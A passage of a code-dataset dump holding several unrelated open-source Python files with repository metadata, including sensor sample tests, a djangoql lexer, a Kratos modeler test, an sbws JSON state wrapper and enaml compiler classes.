"allocated_power": 200,
"topology": "Stndaln",
"unused_power": 485,
"power_supply_num": 1,
"total_power": 715,
"mode": "SP-PS",
"reserved_power": 30,
},
"Powerstack-11": {
"switch_num": 1,
"allocated_power": 295,
"topology": "Stndaln",
"unused_power": 390,
"power_supply_num": 1,
"total_power": 715,
"mode": "SP-PS",
"reserved_power": 30,
},
}
}
| 0 | 0 | 0 |
d1bd8f9d238d2aa19bb05482a8ad5ba9649d115d | 630 | py | Python | tests/sample/climate_sample_test.py | south-coast-science/scs_core | 81ad4010abb37ca935f3a31ac805639ef53b1bcf | [
"MIT"
] | 3 | 2019-03-12T01:59:58.000Z | 2020-09-12T07:27:42.000Z | tests/sample/climate_sample_test.py | south-coast-science/scs_core | 81ad4010abb37ca935f3a31ac805639ef53b1bcf | [
"MIT"
] | 1 | 2018-04-20T07:58:38.000Z | 2021-03-27T08:52:45.000Z | tests/sample/climate_sample_test.py | south-coast-science/scs_core | 81ad4010abb37ca935f3a31ac805639ef53b1bcf | [
"MIT"
] | 4 | 2017-09-29T13:08:43.000Z | 2019-10-09T09:13:58.000Z | #!/usr/bin/env python3
"""
Created on 16 Nov 2020
@author: Bruno Beloff (bruno.beloff@southcoastscience.com)
"""
import json
from scs_core.data.json import JSONify
from scs_core.sample.climate_sample import ClimateSample
# --------------------------------------------------------------------------------------------------------------------
# run...
jstr = '{"tag": "scs-ap1-6", "rec": "2019-01-22T13:55:54Z", "val": {"hmd": 49.3, "tmp": 21.5, "bar": {"pA": 99.8}}}'
print(jstr)
print("-")
jdict = json.loads(jstr)
sample = ClimateSample.construct_from_jdict(jdict)
print(sample)
print("-")
print(JSONify.dumps(sample))
| 21 | 118 | 0.555556 | #!/usr/bin/env python3
"""
Created on 16 Nov 2020
@author: Bruno Beloff (bruno.beloff@southcoastscience.com)
"""
import json
from scs_core.data.json import JSONify
from scs_core.sample.climate_sample import ClimateSample
# --------------------------------------------------------------------------------------------------------------------
# run...
jstr = '{"tag": "scs-ap1-6", "rec": "2019-01-22T13:55:54Z", "val": {"hmd": 49.3, "tmp": 21.5, "bar": {"pA": 99.8}}}'
print(jstr)
print("-")
jdict = json.loads(jstr)
sample = ClimateSample.construct_from_jdict(jdict)
print(sample)
print("-")
print(JSONify.dumps(sample))
| 0 | 0 | 0 |
0bedc3e831ab7fb8bdaaae07208c05d1cd94b9d2 | 680 | py | Python | classifier.py | monkey-cli/monkey-trainer | 50ad34f1ace21ac4435806c3521e4cab5e16c540 | [
"MIT"
] | null | null | null | classifier.py | monkey-cli/monkey-trainer | 50ad34f1ace21ac4435806c3521e4cab5e16c540 | [
"MIT"
] | 1 | 2021-02-12T18:57:24.000Z | 2021-02-12T18:58:15.000Z | classifier.py | monkey-cli/monkey-trainer | 50ad34f1ace21ac4435806c3521e4cab5e16c540 | [
"MIT"
] | null | null | null | import cv2
import subprocess
imageURI = "dummy.png"
image = cv2.imread(imageURI)
cv2.imshow("Focus window", image)
# Device type, simple check
isIOS = True
scriptPath = None
if isIOS:
scriptPath = "./monkey-scripts/monkey-screenshot-ios.sh"
else:
scriptPath = "./monkey-scripts/monkey-screenshot-android.sh"
while True:
key = cv2.waitKey(1)
if key == ord("q"):
print("EXIT!")
break
elif key == ord("p"):
print("Store positive: ")
subprocess.run('bash %s positive' % (scriptPath), shell=True)
elif key == ord("n"):
print("Store negative: ")
subprocess.run('bash %s negative' % (scriptPath), shell=True)
| 22.666667 | 69 | 0.630882 | import cv2
import subprocess
imageURI = "dummy.png"
image = cv2.imread(imageURI)
cv2.imshow("Focus window", image)
# Device type, simple check
isIOS = True
scriptPath = None
if isIOS:
scriptPath = "./monkey-scripts/monkey-screenshot-ios.sh"
else:
scriptPath = "./monkey-scripts/monkey-screenshot-android.sh"
while True:
key = cv2.waitKey(1)
if key == ord("q"):
print("EXIT!")
break
elif key == ord("p"):
print("Store positive: ")
subprocess.run('bash %s positive' % (scriptPath), shell=True)
elif key == ord("n"):
print("Store negative: ")
subprocess.run('bash %s negative' % (scriptPath), shell=True)
| 0 | 0 | 0 |
f913182b513ae01ec8491113fe37ccedc418d446 | 363 | py | Python | examples/example_stdIn.py | Prince2347X/pydoodle | c5dbf5c43eb120eed45a44a8de30848b271eb1b2 | [
"MIT"
] | 11 | 2021-04-05T07:33:32.000Z | 2021-11-21T16:50:59.000Z | examples/example_stdIn.py | Prince2347X/pydoodle | c5dbf5c43eb120eed45a44a8de30848b271eb1b2 | [
"MIT"
] | null | null | null | examples/example_stdIn.py | Prince2347X/pydoodle | c5dbf5c43eb120eed45a44a8de30848b271eb1b2 | [
"MIT"
] | 3 | 2021-05-03T13:53:58.000Z | 2021-06-26T05:11:50.000Z | import pydoodle
c = pydoodle.Compiler(clientId="client-id",
clientSecret="client-secret")
with open(file="test2.py") as f:
script = f.read()
f.close()
result = c.execute(script=script, language="python3",
stdIn="1st Input ||2nd Input") # Double pipe(||) is used to separate multiple inputs.
print(result.output)
| 33 | 105 | 0.630854 | import pydoodle
c = pydoodle.Compiler(clientId="client-id",
clientSecret="client-secret")
with open(file="test2.py") as f:
script = f.read()
f.close()
result = c.execute(script=script, language="python3",
stdIn="1st Input ||2nd Input") # Double pipe(||) is used to separate multiple inputs.
print(result.output)
| 0 | 0 | 0 |
2d08d8891b2a537c867a0fe586168d7a88dacc35 | 484 | py | Python | bdcloud_paper/python_prototype/samplers.py | rnowling/bigpetstore-data-generator | fae5a4a84343d06545ebed77be35bc527d625ad7 | [
"Apache-2.0"
] | 6 | 2015-04-08T02:56:41.000Z | 2021-05-26T15:21:17.000Z | bdcloud_paper/python_prototype/samplers.py | rnowling/bigpetstore-data-generator | fae5a4a84343d06545ebed77be35bc527d625ad7 | [
"Apache-2.0"
] | 8 | 2015-01-10T02:02:49.000Z | 2015-02-12T15:27:44.000Z | bdcloud_paper/python_prototype/samplers.py | rnowling/bigpetstore-data-generator | fae5a4a84343d06545ebed77be35bc527d625ad7 | [
"Apache-2.0"
] | 5 | 2015-08-30T19:56:42.000Z | 2018-12-30T22:16:35.000Z | import random
| 25.473684 | 54 | 0.528926 | import random
class RouletteWheelSampler(object):
def __init__(self, values):
self._wheel = []
end = 0.0
for x, w in values:
end += w
self._wheel.append((end, x))
def sample(self):
r = random.random()
for end, x in self._wheel:
if r <= end:
return x
# we should never get here since probabilities
# should sum to 1
raise Exception, "Could not pick a value!"
| 380 | 14 | 76 |
b39c4cdcb731753ed352c502c1d23118d2de8c0b | 3,231 | py | Python | kratos/tests/test_delete_model_parts_modeler.py | hbayraktaroglu/Kratos | 6b71869ca7adb36a798e0cb11b34287fdc482590 | [
"BSD-4-Clause"
] | null | null | null | kratos/tests/test_delete_model_parts_modeler.py | hbayraktaroglu/Kratos | 6b71869ca7adb36a798e0cb11b34287fdc482590 | [
"BSD-4-Clause"
] | null | null | null | kratos/tests/test_delete_model_parts_modeler.py | hbayraktaroglu/Kratos | 6b71869ca7adb36a798e0cb11b34287fdc482590 | [
"BSD-4-Clause"
] | null | null | null | # Importing the Kratos Library
import KratosMultiphysics
import KratosMultiphysics.KratosUnittest as KratosUnittest
from KratosMultiphysics.modelers.delete_model_parts_modeler import DeleteModelPartsModeler
if __name__ == '__main__':
KratosMultiphysics.Logger.GetDefaultOutput().SetSeverity(KratosMultiphysics.Logger.Severity.WARNING)
KratosUnittest.main() | 46.826087 | 105 | 0.7264 | # Importing the Kratos Library
import KratosMultiphysics
import KratosMultiphysics.KratosUnittest as KratosUnittest
from KratosMultiphysics.modelers.delete_model_parts_modeler import DeleteModelPartsModeler
class TestDeleteModelPartModeler(KratosUnittest.TestCase):
def testDeleteModelPartModelerOneModelPart(self):
# Create a fake model part hierarchy to operate with
model = KratosMultiphysics.Model()
model.CreateModelPart("ModelPart1")
model.CreateModelPart("ModelPart2")
# Set up the import model part modeler
settings = KratosMultiphysics.Parameters('''{
"model_part_names" : ["ModelPart2"]
}''')
delete_model_parts_modeler = DeleteModelPartsModeler(model, settings)
# Call the modeler methods
delete_model_parts_modeler.SetupGeometryModel()
delete_model_parts_modeler.PrepareGeometryModel()
delete_model_parts_modeler.SetupModelPart()
# Check results
self.assertTrue(model.HasModelPart("ModelPart1"))
self.assertFalse(model.HasModelPart("ModelPart2"))
def testDeleteModelPartModelerMultipleModelParts(self):
# Create a fake model part hierarchy to operate with
model = KratosMultiphysics.Model()
model_part_1 = model.CreateModelPart("ModelPart1")
model_part_1_1 = model_part_1.CreateSubModelPart("SubModelPart11")
model_part_1_1_2 = model_part_1_1.CreateSubModelPart("SubModelPart112")
model_part_1_1_2.CreateSubModelPart("SubModelPart1121")
model_part_1_1_2.CreateSubModelPart("SubModelPart1122")
model_part_2 = model.CreateModelPart("ModelPart2")
model_part_2.CreateSubModelPart("SubModelPart21")
model_part_2_2 = model_part_2.CreateSubModelPart("SubModelPart22")
model_part_2_2_1 = model_part_2_2.CreateSubModelPart("SubModelPart221")
model_part_2_2_1.CreateSubModelPart("SubModelPart2211")
# Set up the import model part modeler
settings = KratosMultiphysics.Parameters('''{
"echo_level" : 2,
"model_part_names" : [
"ModelPart1.SubModelPart11",
"ModelPart1.SubModelPart11.SubModelPart112",
"ModelPart2.SubModelPart22.SubModelPart221.SubModelPart2211",
"ModelPart2.SubModelPart21",
"ModelPart1"]
}''')
delete_model_parts_modeler = DeleteModelPartsModeler(model, settings)
# Call the modeler methods
delete_model_parts_modeler.SetupGeometryModel()
delete_model_parts_modeler.PrepareGeometryModel()
delete_model_parts_modeler.SetupModelPart()
# Check results
self.assertTrue(model.HasModelPart("ModelPart2"))
self.assertTrue(model.HasModelPart("ModelPart2.SubModelPart22"))
self.assertTrue(model.HasModelPart("ModelPart2.SubModelPart22.SubModelPart221"))
self.assertTrue(model.HasModelPart("ModelPart2.SubModelPart22.SubModelPart221.SubModelPart2211"))
self.assertFalse(model.HasModelPart("ModelPart1"))
if __name__ == '__main__':
KratosMultiphysics.Logger.GetDefaultOutput().SetSeverity(KratosMultiphysics.Logger.Severity.WARNING)
KratosUnittest.main() | 2,753 | 37 | 76 |
64652ddca6102b9868aadc77bb15fee6c313ab7e | 548 | py | Python | angalabiri/shop/migrations/0004_productvariation_varation_type.py | dark-codr/ebiangala | 0af3de29b2afa71df3e138cd16ecddc69fbd597d | [
"MIT"
] | 1 | 2021-03-25T14:06:23.000Z | 2021-03-25T14:06:23.000Z | angalabiri/shop/migrations/0004_productvariation_varation_type.py | dark-codr/ebiangala | 0af3de29b2afa71df3e138cd16ecddc69fbd597d | [
"MIT"
] | 5 | 2021-09-08T03:08:46.000Z | 2022-03-12T00:56:35.000Z | angalabiri/shop/migrations/0004_productvariation_varation_type.py | me-edavids/ebiangala | 0af3de29b2afa71df3e138cd16ecddc69fbd597d | [
"MIT"
] | null | null | null | # Generated by Django 3.1.7 on 2021-03-31 22:21
from django.db import migrations, models
| 28.842105 | 201 | 0.620438 | # Generated by Django 3.1.7 on 2021-03-31 22:21
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('shop', '0003_product_old_stock'),
]
operations = [
migrations.AddField(
model_name='productvariation',
name='varation_type',
field=models.CharField(blank=True, choices=[('SIZE', 'SIZE'), ('WEIGHT', 'WEIGHT'), ('COLOR', 'COLOR')], default='SIZE', max_length=150, null=True, verbose_name='Type of Variation to add'),
),
]
| 0 | 434 | 23 |
b6614a7082de6cf37bfc2b8529705dec58d50267 | 3,410 | py | Python | sbws/util/state.py | juga0/simple-bw-scanner | fd139b89de20b6d38941f137325e05069995793b | [
"CC0-1.0"
] | 15 | 2018-09-24T00:56:19.000Z | 2022-03-30T08:47:20.000Z | sbws/util/state.py | juga0/simple-bw-scanner | fd139b89de20b6d38941f137325e05069995793b | [
"CC0-1.0"
] | 52 | 2018-10-08T08:27:38.000Z | 2020-03-09T14:40:26.000Z | sbws/util/state.py | juga0/simple-bw-scanner | fd139b89de20b6d38941f137325e05069995793b | [
"CC0-1.0"
] | 11 | 2018-10-05T16:36:44.000Z | 2021-12-29T14:47:43.000Z | from sbws.util.filelock import FileLock
import os
import json
from .json import CustomDecoder, CustomEncoder
class State:
"""
`json` wrapper to read a json file every time it gets a key and to write
to the file every time a key is set.
Every time a key is got or set, the file is locked, to atomically access
and update the file across threads and across processes.
>>> state = State('foo.state')
>>> # state == {}
>>> state['linux'] = True
>>> # 'foo.state' now exists on disk with the JSON for {'linux': True}
>>> # We read 'foo.state' from disk in order to get the most up-to-date
>>> # state info. Pretend another process has updated 'linux' to be
>>> # False
>>> state['linux']
>>> # returns False
>>> # Pretend another process has added the user's age to the state file.
>>> # As before, we read the state file from disk for the most
>>> # up-to-date info.
>>> state['age']
>>> # Returns 14
>>> # We now set their name. We read the state file first, set the option,
>>> # and then write it out.
>>> state['name'] = 'John'
>>> # We can do many of the same things with a State object as with a dict
>>> for key in state: print(key)
>>> # Prints 'linux', 'age', and 'name'
"""
def get(self, key, d=None):
"""
Implements a dictionary ``get`` method reading and locking
a json file.
"""
self._state = self._read()
return self._state.get(key, d)
def count(self, k):
"""
Returns the length if the key value is a list
or the sum of number if the key value is a list of list
or the key value
or None if the state doesn't have the key.
"""
if self.get(k):
if isinstance(self._state[k], list):
if isinstance(self._state[k][0], list):
return sum(map(lambda x: x[1], self._state[k]))
return len(self._state[k])
return self.get(k)
return None
| 31 | 78 | 0.583871 | from sbws.util.filelock import FileLock
import os
import json
from .json import CustomDecoder, CustomEncoder
class State:
"""
`json` wrapper to read a json file every time it gets a key and to write
to the file every time a key is set.
Every time a key is got or set, the file is locked, to atomically access
and update the file across threads and across processes.
>>> state = State('foo.state')
>>> # state == {}
>>> state['linux'] = True
>>> # 'foo.state' now exists on disk with the JSON for {'linux': True}
>>> # We read 'foo.state' from disk in order to get the most up-to-date
>>> # state info. Pretend another process has updated 'linux' to be
>>> # False
>>> state['linux']
>>> # returns False
>>> # Pretend another process has added the user's age to the state file.
>>> # As before, we read the state file from disk for the most
>>> # up-to-date info.
>>> state['age']
>>> # Returns 14
>>> # We now set their name. We read the state file first, set the option,
>>> # and then write it out.
>>> state['name'] = 'John'
>>> # We can do many of the same things with a State object as with a dict
>>> for key in state: print(key)
>>> # Prints 'linux', 'age', and 'name'
"""
def __init__(self, fname):
self._fname = fname
self._state = self._read()
def _read(self):
if not os.path.exists(self._fname):
return {}
with FileLock(self._fname):
with open(self._fname, 'rt') as fd:
return json.load(fd, cls=CustomDecoder)
def _write(self):
with FileLock(self._fname):
with open(self._fname, 'wt') as fd:
return json.dump(self._state, fd, indent=4, cls=CustomEncoder)
def __len__(self):
self._state = self._read()
return self._state.__len__()
def get(self, key, d=None):
"""
Implements a dictionary ``get`` method reading and locking
a json file.
"""
self._state = self._read()
return self._state.get(key, d)
def __getitem__(self, key):
self._state = self._read()
return self._state.__getitem__(key)
def __delitem__(self, key):
self._state = self._read()
self._state.__delitem__(key)
self._write()
def __setitem__(self, key, value):
# NOTE: important, read the file before setting the key,
# otherwise if other instances are creating other keys, they're lost.
self._state = self._read()
self._state.__setitem__(key, value)
self._write()
def __iter__(self):
self._state = self._read()
return self._state.__iter__()
def __contains__(self, item):
self._state = self._read()
return self._state.__contains__(item)
def count(self, k):
"""
Returns the length if the key value is a list
or the sum of number if the key value is a list of list
or the key value
or None if the state doesn't have the key.
"""
if self.get(k):
if isinstance(self._state[k], list):
if isinstance(self._state[k][0], list):
return sum(map(lambda x: x[1], self._state[k]))
return len(self._state[k])
return self.get(k)
return None
| 1,099 | 0 | 243 |
c5492ac6722300d26d1822224e145070df8b46c3 | 918 | py | Python | day09/day09.py | alcatrazEscapee/AdventOfCode2021 | a473b01b8931791b4a1fd03bf05b286ed0ac9f85 | [
"MIT"
] | 4 | 2021-12-07T22:25:51.000Z | 2021-12-22T18:15:25.000Z | day09/day09.py | alcatrazEscapee/AdventOfCode2021 | a473b01b8931791b4a1fd03bf05b286ed0ac9f85 | [
"MIT"
] | null | null | null | day09/day09.py | alcatrazEscapee/AdventOfCode2021 | a473b01b8931791b4a1fd03bf05b286ed0ac9f85 | [
"MIT"
] | 1 | 2021-12-17T00:47:26.000Z | 2021-12-17T00:47:26.000Z | # Day 9: Smoke Basin
# Leaderboard Rank: 60 / 20
from utils import FiniteGrid, get_input
from collections import Counter
if __name__ == '__main__':
main(get_input())
| 28.6875 | 86 | 0.603486 | # Day 9: Smoke Basin
# Leaderboard Rank: 60 / 20
from utils import FiniteGrid, get_input
from collections import Counter
def main(text: str):
grid: FiniteGrid[int] = FiniteGrid.of_str(text, default='9').map_values(int)
risk = 0
for pos in grid.locations():
height = grid[pos]
if all(height < grid[adj] for adj in pos.neighbors()):
risk += 1 + height
print('Part 1:', risk)
basins = Counter() # collect the number of points that terminate in any one basin
for pos in grid.locations():
if grid[pos] != 9: # height 9 do not belong to any basin
while any(grid[low := adj] < grid[pos] for adj in pos.neighbors()):
pos = low # Step downwards until we reach a low point
basins[pos] += 1
a, b, c = basins.most_common(3)
print('Part 2:', a[1] * b[1] * c[1])
if __name__ == '__main__':
main(get_input())
| 721 | 0 | 23 |
d29f6c144da74d1fa33b5a79532d015a19b058b9 | 3,834 | py | Python | djangoql/lexer.py | Bodyhealer/djangoql | 4e95317997a9543444a1eea22c6e71710525661c | [
"MIT"
] | null | null | null | djangoql/lexer.py | Bodyhealer/djangoql | 4e95317997a9543444a1eea22c6e71710525661c | [
"MIT"
] | null | null | null | djangoql/lexer.py | Bodyhealer/djangoql | 4e95317997a9543444a1eea22c6e71710525661c | [
"MIT"
] | null | null | null | from __future__ import unicode_literals
import ply.lex as lex
from ply.lex import TOKEN
from .exceptions import DjangoQLLexerError
| 22.686391 | 76 | 0.532603 | from __future__ import unicode_literals
import ply.lex as lex
from ply.lex import TOKEN
from .exceptions import DjangoQLLexerError
class DjangoQLLexer(object):
def __init__(self, **kwargs):
self._lexer = lex.lex(module=self, **kwargs)
self.reset()
def reset(self):
self.text = ''
self._lexer.lineno = 1
return self
def input(self, s):
self.reset()
self.text = s
self._lexer.input(s)
return self
def token(self):
return self._lexer.token()
# Iterator interface
def __iter__(self):
return self
def next(self):
t = self.token()
if t is None:
raise StopIteration
return t
__next__ = next
def find_column(self, t):
"""
Returns token position in current text, starting from 1
"""
cr = max(
self.text.rfind(lt, 0, t.lexpos) for lt in self.line_terminators
)
if cr == -1:
return t.lexpos + 1
return t.lexpos - cr
whitespace = ' \t\v\f\u00A0'
line_terminators = '\n\r\u2028\u2029'
re_line_terminators = r'\n\r\u2028\u2029'
re_escaped_char = r'\\[\"\\/bfnrt]'
re_escaped_unicode = r'\\u[0-9A-Fa-f]{4}'
re_string_char = r'[^\"' + re_line_terminators + u']'
re_int_value = r'(-?0|-?[1-9][0-9]*)'
re_fraction_part = r'\.[0-9]+'
re_exponent_part = r'[eE][\+-]?[0-9]+'
tokens = [
'COMMA',
'OR',
'AND',
'NOT',
'IN',
'TRUE',
'FALSE',
'NONE',
'NAME',
'STRING_VALUE',
'FLOAT_VALUE',
'INT_VALUE',
'PAREN_L',
'PAREN_R',
'EQUALS',
'NOT_EQUALS',
'GREATER',
'GREATER_EQUAL',
'LESS',
'LESS_EQUAL',
'CONTAINS',
'NOT_CONTAINS',
'REGEX',
]
t_COMMA = ','
t_PAREN_L = r'\('
t_PAREN_R = r'\)'
t_EQUALS = '='
t_NOT_EQUALS = '!='
t_GREATER = '>'
t_GREATER_EQUAL = '>='
t_LESS = '<'
t_LESS_EQUAL = '<='
t_CONTAINS = '~'
t_NOT_CONTAINS = '!~'
t_NAME = r'[_A-Za-z][_0-9A-Za-z]*(\.[_A-Za-z][_0-9A-Za-z]*)*'
t_ignore = whitespace
@TOKEN(r'\"(' + re_escaped_char +
'|' + re_escaped_unicode +
'|' + re_string_char + r')*\"')
def t_STRING_VALUE(self, t):
t.value = t.value[1:-1] # cut leading and trailing quotes ""
return t
@TOKEN(re_int_value + re_fraction_part + re_exponent_part + '|' +
re_int_value + re_fraction_part + '|' +
re_int_value + re_exponent_part)
def t_FLOAT_VALUE(self, t):
return t
@TOKEN(re_int_value)
def t_INT_VALUE(self, t):
return t
not_followed_by_name = '(?![_0-9A-Za-z])'
@TOKEN('or' + not_followed_by_name)
def t_OR(self, t):
return t
@TOKEN('and' + not_followed_by_name)
def t_AND(self, t):
return t
@TOKEN('not' + not_followed_by_name)
def t_NOT(self, t):
return t
@TOKEN('in' + not_followed_by_name)
def t_IN(self, t):
return t
@TOKEN('regex' + not_followed_by_name)
def t_REGEX(self, t):
return t
@TOKEN('True' + not_followed_by_name)
def t_TRUE(self, t):
return t
@TOKEN('False' + not_followed_by_name)
def t_FALSE(self, t):
return t
@TOKEN('None' + not_followed_by_name)
def t_NONE(self, t):
return t
def t_error(self, t):
raise DjangoQLLexerError(
message='Illegal character %s' % repr(t.value[0]),
value=t.value,
line=t.lineno,
column=self.find_column(t),
)
@TOKEN('[' + re_line_terminators + ']+')
def t_newline(self, t):
t.lexer.lineno += len(t.value)
return
| 898 | 2,779 | 23 |
f1ca6994cfa86a641058969e3ef4a37d988330ff | 3,539 | py | Python | Python3-Learn/AdventureWithRio.py | nikhiljain-413/Hacktoberfest2021_beginner | 56b008c9ed294c3fc23b44fa13faced99948236d | [
"MIT"
] | 65 | 2021-10-01T07:02:29.000Z | 2022-03-23T10:41:37.000Z | Python3-Learn/AdventureWithRio.py | nikhiljain-413/Hacktoberfest2021_beginner | 56b008c9ed294c3fc23b44fa13faced99948236d | [
"MIT"
] | 82 | 2021-10-01T14:21:42.000Z | 2022-03-29T03:43:58.000Z | Python3-Learn/AdventureWithRio.py | nikhiljain-413/Hacktoberfest2021_beginner | 56b008c9ed294c3fc23b44fa13faced99948236d | [
"MIT"
] | 210 | 2021-10-01T07:02:39.000Z | 2022-03-27T17:41:00.000Z | #AUTHOR: Rio Cantre
#Python3 Concept: Adventure Game
#GITHUB: https://github.com/RioCantre
import time
import random
weather = ["sunny", "rainy", "stormy", "windy", "snowy", "dark"]
ambience = random.choice(weather)
tools = ["flashlight", "stick", "bat", "gun", "phone", "knife"]
weapon = random.choice(tools)
emotions = ["scared", "tired", "nervours", "crying", "sweating"]
condition = random.choice(emotions)
play_game()
| 32.768519 | 76 | 0.631534 | #AUTHOR: Rio Cantre
#Python3 Concept: Adventure Game
#GITHUB: https://github.com/RioCantre
import time
import random
weather = ["sunny", "rainy", "stormy", "windy", "snowy", "dark"]
ambience = random.choice(weather)
tools = ["flashlight", "stick", "bat", "gun", "phone", "knife"]
weapon = random.choice(tools)
emotions = ["scared", "tired", "nervours", "crying", "sweating"]
condition = random.choice(emotions)
def print_pause(message_to_print):
print(message_to_print)
time.sleep(0.2)
def intro():
print_pause("You woke up from your nap.")
print_pause("It's a " + ambience + " afternoon.")
print_pause("You heard a strange noise coming from the backyard.")
print_pause("The noise is getting more bolder and louder.")
print_pause("You are so curious.\n")
def first_move():
print_pause("You grab a " + weapon + " and head towards the back door.")
print_pause("You sneak to the backdoor slowly and smoothly.")
print_pause("As you get closer the noise seems so familiar.")
choice = input("Would you run away? yes or no?")
if choice == "no":
print_pause("It's the same wild Boar from yesterday.")
print_pause("It stopped eating the sack of potatoes on the floor.")
print_pause("It looked around and finally saw you.")
print_pause("Both of you are staring.")
attack = input("Initiate attack? yes or no?")
if attack == "yes":
print_pause("You lift up your hand with your " +
weapon + " and smash it on the wall.")
print_pause("The boar run away as quickly as it can.")
if attack == "no":
print_pause("The boar growl and roar. Trying to scare you.")
print_pause("As you lift your hand, it run away quickly.")
conclusion()
elif choice == "yes":
print_pause("You run fast heading back and close the door.")
conclusion()
else:
print_pause("You're a warrior.\n")
conclusion()
def second_move():
print_pause("You grab your keys and lock the back door.")
print_pause("You called someone and told them to come and get you.")
print_pause("You were " + condition + " and waiting for help to come.")
print_pause("The noise suddenly stop.")
print_pause("You calm down and went out of bed.")
next_step = input("Would you like to continue or no?")
if next_step == "continue":
print_pause("You went slowy heading to the backdoor.")
print_pause("Your dog suddenly appeared behind you.")
print_pause("That surprises you and felt relief.")
conclusion()
elif next_step == "no":
print_pause("You stayed in bed and went back to sleep.")
conclusion()
else:
print_pause("continue or no?\n")
conclusion()
def reaction():
print_pause("Enter 1 to go out and investigate.")
print_pause("Enter 2 to lock the door and call for help.")
print_pause("What will you do?")
moves = input("(Please enter 1 or 2.)\n")
if moves == "1":
first_move()
elif moves == "2":
second_move()
else:
conclusion()
def conclusion():
play_again = input("Would you like to restart? yes or no?\n")
if play_again == "yes":
print_pause("Okay, mighty warrior.")
reaction()
elif play_again == "no":
print_pause("You're a brave warrior.")
else:
print_pause("Please enter yes or no.")
conclusion()
def play_game():
intro()
reaction()
play_game()
| 2,942 | 0 | 161 |
44dd6ee2425f137fd9c53b0be99c6741efb74649 | 1,596 | py | Python | tests/test_day17_2.py | pcalg/AdventOfCode2019 | 93b55414c7ad13d2d74d1dea1df98dd481b94d5a | [
"MIT"
] | null | null | null | tests/test_day17_2.py | pcalg/AdventOfCode2019 | 93b55414c7ad13d2d74d1dea1df98dd481b94d5a | [
"MIT"
] | 6 | 2020-02-04T20:45:02.000Z | 2020-02-04T20:45:03.000Z | tests/test_day17_2.py | pcalg/AdventOfCode2019 | 93b55414c7ad13d2d74d1dea1df98dd481b94d5a | [
"MIT"
] | null | null | null | from app.day17_2 import cross2d
from app.day17_2 import len_route
from app.day17_2 import all_sub_lists
from app.day17_2 import possible_register_values
from app.day17_2 import has_possible_route
| 37.116279 | 93 | 0.464286 | from app.day17_2 import cross2d
from app.day17_2 import len_route
from app.day17_2 import all_sub_lists
from app.day17_2 import possible_register_values
from app.day17_2 import has_possible_route
class TestDay17_2:
def test_cross2d(self):
assert cross2d((0, 1), (1, 0)) == -1
assert cross2d((0, 1), (0, 1)) == 0
assert cross2d((0, 1), (-1, 0)) == 1
assert cross2d((1, 0), (0, 1)) == 1
assert cross2d((1, 0), (0, -1)) == -1
assert cross2d((-1, 0), (0, 1)) == -1
assert cross2d((-1, 0), (0, -1)) == 1
def test_len_route(self):
assert len_route([]) == 0
assert len_route([('R', 1)]) == 3
assert len_route([('R', 1), ('L', 33), ('R', 9)]) == 12
def test_all_sub_lists(self):
assert list(all_sub_lists([('R', 1), ('L', 33), ('R', 9)])) == \
[[('R', 1)],
[('R', 1), ('L', 33)],
[('R', 1), ('L', 33), ('R', 9)],
[('L', 33)],
[('L', 33), ('R', 9)],
[('R', 9)]]
def test_possible_register_values(self):
possible_values = list(possible_register_values([('R', 1), ('L', 33), ('R', 9)]))
assert len(possible_values) == 20
assert ([('R', 1), ('L', 33)], [('L', 33)], [('L', 33), ('R', 9)]) in possible_values
def test_has_possible_route(self):
res, actions = has_possible_route([('R', 1), ('L', 33), ('R', 9), ('R', 9)],
[[('R', 9)], [('R', 1), ('L', 33)], []])
assert res == True
assert actions == [1, 0, 0]
| 1,244 | -3 | 158 |
1bebd0e161e5d84621069a3146b89b69793f068a | 508 | py | Python | biopanning_data_bank/bdb_tables/sotmc.py | griffinclausen/bdb | 5b29995ebf399ce47a874984bd6e9eec879327b8 | [
"MIT"
] | null | null | null | biopanning_data_bank/bdb_tables/sotmc.py | griffinclausen/bdb | 5b29995ebf399ce47a874984bd6e9eec879327b8 | [
"MIT"
] | 1 | 2021-06-01T23:26:15.000Z | 2021-06-01T23:26:15.000Z | biopanning_data_bank/bdb_tables/sotmc.py | griffinclausen/bdb | 5b29995ebf399ce47a874984bd6e9eec879327b8 | [
"MIT"
] | null | null | null | from biopanning_data_bank.bdb_tables.tables import (
BDB_Entry, BDB_Database)
from biopanning_data_bank.bdb_tables.fields import (
SOTMC_FIELDS)
class SOTMC(BDB_Entry):
"""
SOTMC entry container from Biopanning Data Bank SOTMC Database.
"""
| 23.090909 | 67 | 0.688976 | from biopanning_data_bank.bdb_tables.tables import (
BDB_Entry, BDB_Database)
from biopanning_data_bank.bdb_tables.fields import (
SOTMC_FIELDS)
class SOTMCDatabase(BDB_Database):
def __init__(self, entries):
self.fields = SOTMC_FIELDS
super().__init__(entries)
class SOTMC(BDB_Entry):
"""
SOTMC entry container from Biopanning Data Bank SOTMC Database.
"""
def __init__(self, tree):
self.fields = SOTMC_FIELDS
super().__init__(tree)
| 146 | 13 | 77 |
57a23ec08a099a9c054fd60256f6bc69af42a90b | 6,268 | py | Python | enaml/core/block_compiler.py | xtuzy/enaml | a1b5c0df71c665b6ef7f61d21260db92d77d9a46 | [
"BSD-3-Clause-Clear"
] | 1,080 | 2015-01-04T14:29:34.000Z | 2022-03-29T05:44:51.000Z | enaml/core/block_compiler.py | xtuzy/enaml | a1b5c0df71c665b6ef7f61d21260db92d77d9a46 | [
"BSD-3-Clause-Clear"
] | 308 | 2015-01-05T22:44:13.000Z | 2022-03-30T21:19:18.000Z | enaml/core/block_compiler.py | xtuzy/enaml | a1b5c0df71c665b6ef7f61d21260db92d77d9a46 | [
"BSD-3-Clause-Clear"
] | 123 | 2015-01-25T16:33:48.000Z | 2022-02-25T19:57:10.000Z | #------------------------------------------------------------------------------
# Copyright (c) 2013-2017, Nucleic Development Team.
#
# Distributed under the terms of the Modified BSD License.
#
# The full license is in the file LICENSE, distributed with this software.
#------------------------------------------------------------------------------
from atom.api import Typed
from . import compiler_common as cmn
class BaseBlockCompiler(cmn.CompilerBase):
""" The base class of the block compilers.
"""
#: The set of local names for the compiler.
local_names = Typed(set, ())
#: A mapping of ast node -> compiler node index for the block.
index_map = Typed(dict, ())
def parent_index(self):
""" Get the node index for the parent node.
Returns
-------
result : int
The compiler node index for the node represented by the
current parent ast node.
"""
return self.index_map[self.ancestor()]
class FirstPassBlockCompiler(BaseBlockCompiler):
""" The first pass block compiler.
This is a base class for the first pass compilers for the enamldef
and template block definitions.
"""
#: A mapping of auxiliary ast node -> compiler node index.
aux_index_map = Typed(dict, ())
class SecondPassBlockCompiler(BaseBlockCompiler):
